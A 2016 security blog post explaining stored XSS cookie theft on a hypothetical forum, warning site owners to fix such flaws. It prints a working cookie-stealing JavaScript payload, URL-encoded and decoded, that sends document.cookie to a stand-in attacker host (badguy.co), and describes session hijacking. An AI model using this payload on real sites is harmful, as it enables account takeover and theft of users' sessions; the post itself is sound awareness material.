Wednesday, April 20, 2016

XSS Cookie Theft

There are still scenarios where cookie theft might be useful for an attacker. If an XSS (Cross-Site Scripting) vulnerability exists on your website, the attacker may use it to swipe your customer's cookies and perhaps use it to login with their session or collect other types of information stored in the cookies. Let's see an example.

Assume there is a website that had a valuable sessionid cookie the bad guy wanted to steal from your end users. If he can find a XSS vulnerabilty on your website, such as in this "name" parameter below, so that when the attacker changes the title of a forum post, he is allowed to inject javascript into the title instead of just text

http://www.goodforum.com/post?name=MyTitle

... and the attacker finds out that the javascript he saves into the title gets executed every time a user loads his forum post. This type of XSS is called stored XSS, and the attacker could inject some malicious payload such as

http://www.goodforum.com/post?name=new%20Image().src%20%3D%20%27http%3A%2F%2Fbadguy.co%2Feat.php%3Fcookie%3D%27%20%2B%20encodeURI(document.cookie)%3B

If you decode the XSS payload you see this javascript code

new Image().src = 'http://badguy.co/eat.php?cookie=' + encodeURI(document.cookie);

If you watch this code execute in the browser you see a callout to the bad guy, and oops the sessionid cookie seems to have gone out too!



It's that simple. Now if the bad guy checks his web logs, he can see the user's session id value, and if he's using the proper tools, he's probably got it automated to the point where it takes the session id and immediately turns around and opens up the attackers browser with the end user's session and allows the attacker to browse around the website as that user. Thus take XSS seriously and fix those vulnerabilities!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. php injection ali.txt walk-thru


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment